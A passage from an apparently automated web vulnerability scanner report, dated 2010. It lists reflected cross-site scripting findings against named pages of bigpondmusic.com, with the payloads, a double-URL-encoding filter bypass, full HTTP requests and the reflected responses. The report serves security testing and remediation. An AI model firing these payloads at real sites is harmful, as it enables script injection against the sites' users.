p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88368


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album1bc4c"><script>alert(1)</script>852e427d902/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn" />
...[SNIP]...

2.154. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe325"style%3d"x%3aexpression(alert(1))"c690ff87c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe325"style="x:expression(alert(1))"c690ff87c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn?fe325"style%3d"x%3aexpression(alert(1))"c690ff87c07=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 132595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - He Will Ha
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn?fe325"style="x:expression(alert(1))"c690ff87c07=1" />
...[SNIP]...

2.155. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b5a"style%3d"x%3aexpression(alert(1))"bce27fd6229 was submitted in the CID parameter. This input was echoed as f8b5a"style="x:expression(alert(1))"bce27fd6229 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?CID=ZBP_MUS_sofresh2011_100x70_221110f8b5a"style%3d"x%3aexpression(alert(1))"bce27fd6229 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 153503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - So Fresh T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?CID=ZBP_MUS_sofresh2011_100x70_221110f8b5a"style="x:expression(alert(1))"bce27fd6229" />
...[SNIP]...

2.156. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ad01'%3be08d6c44f91 was submitted in the REST URL parameter 1. This input was echoed as 7ad01';e08d6c44f91 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album7ad01'%3be08d6c44f91/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88263


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album7ad01';e08d6c44f91';
   s.prop4 = 'various-artists';
   s.prop5 = 'so-fresh-the-hits-of-summer-2011-the-best-of-2010';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier
...[SNIP]...

2.157. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4db73f5a8a4 was submitted in the REST URL parameter 1. This input was echoed as 754d1"><script>alert(1)</script>4db73f5a8a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album754d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4db73f5a8a4/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88092


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album754d1"><script>alert(1)</script>4db73f5a8a4/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010" />
...[SNIP]...

2.158. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bfcd"style%3d"x%3aexpression(alert(1))"22a4ca4833e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bfcd"style="x:expression(alert(1))"22a4ca4833e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?1bfcd"style%3d"x%3aexpression(alert(1))"22a4ca4833e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 153233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - So Fresh T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?1bfcd"style="x:expression(alert(1))"22a4ca4833e=1" />
...[SNIP]...

2.159. http://bigpondmusic.com/album/various-artists/weekend-songs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 965ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c19fa9bd1 was submitted in the REST URL parameter 1. This input was echoed as 965ed"><script>alert(1)</script>d0c19fa9bd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album965ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c19fa9bd1/various-artists/weekend-songs HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88461


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album965ed"><script>alert(1)</script>d0c19fa9bd1/various-artists/weekend-songs" />
...[SNIP]...

2.160. http://bigpondmusic.com/album/various-artists/weekend-songs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a148'%3b45d6ab478f5 was submitted in the REST URL parameter 1. This input was echoed as 3a148';45d6ab478f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album3a148'%3b45d6ab478f5/various-artists/weekend-songs HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88238


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album3a148';45d6ab478f5';
   s.prop4 = 'various-artists';
   s.prop5 = 'weekend-songs';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.p
...[SNIP]...

2.161. http://bigpondmusic.com/album/various-artists/weekend-songs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3767"style%3d"x%3aexpression(alert(1))"e545b48a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3767"style="x:expression(alert(1))"e545b48a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/weekend-songs?c3767"style%3d"x%3aexpression(alert(1))"e545b48a308=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 169650


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - Weekend So
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/weekend-songs?c3767"style="x:expression(alert(1))"e545b48a308=1" />
...[SNIP]...

2.162. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1081'%3b46a0f08e718 was submitted in the REST URL parameter 1. This input was echoed as e1081';46a0f08e718 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargainse1081'%3b46a0f08e718/dalbums HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargainse1081';46a0f08e718';
   s.prop4 = 'dalbums';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.163. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e05b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a53617805a was submitted in the REST URL parameter 1. This input was echoed as 1e05b"><script>alert(1)</script>6a53617805a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains1e05b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a53617805a/dalbums HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains1e05b"><script>alert(1)</script>6a53617805a/dalbums" />
...[SNIP]...

2.164. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eadd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f418beffdc was submitted in the REST URL parameter 2. This input was echoed as eadd3"><script>alert(1)</script>9f418beffdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/dalbumseadd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f418beffdc HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88231


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/dalbumseadd3"><script>alert(1)</script>9f418beffdc" />
...[SNIP]...

2.165. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

